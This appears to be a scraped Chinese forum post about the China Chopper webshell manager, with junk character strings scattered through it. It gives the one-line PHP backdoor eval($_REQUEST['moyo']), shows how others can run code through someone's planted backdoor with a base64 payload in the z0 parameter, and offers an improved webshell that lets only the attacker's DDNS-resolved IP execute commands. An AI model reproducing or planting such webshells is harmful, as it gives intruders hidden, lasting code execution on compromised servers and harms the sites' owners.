今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
* B- M! R. j9 I3 a$ y; Q3 x: U% C/ w4 w! k' y
就算你设置了密码,使用了eval($_REQUEST['moyo']);
' ~/ L2 S# V! _$ D
5 A* t# X5 K) l4 k' l3 T但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门$ M& b+ b) V$ ]2 r
. u3 k1 p" H3 S5 ]9 t
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
: G2 m8 D0 z0 E) j% H8 B4 R! r# O% B' v7 S: |) A
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
1 d5 v2 J" o0 k6 R- P9 G
! ]" g& k2 [# m, P不知道是设计缺陷还是故意留的后门
( d8 r H0 Q+ Y" D7 v& {# |( Z
! y' ?; g8 \2 ~; X# n& W& Q如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
3 A% U$ X# T$ p5 L) S, k: E+ }) `8 x5 s7 j
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
- I; c( F( C9 r6 T" G2 P# }
" e9 S z' Q! k4 o' @然后一句话后门这样写
5 X" U" ]4 l! H2 I% I5 l
: h+ B, K. S7 G$ ~, y- h( j8 g9 q<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>- m, F }- D/ K- I! V
这样就可以让一句话后门只允许自己的电脑连接了6 t) {7 X1 K* j3 ]# q, t" i
( d$ L" g; P5 E: { |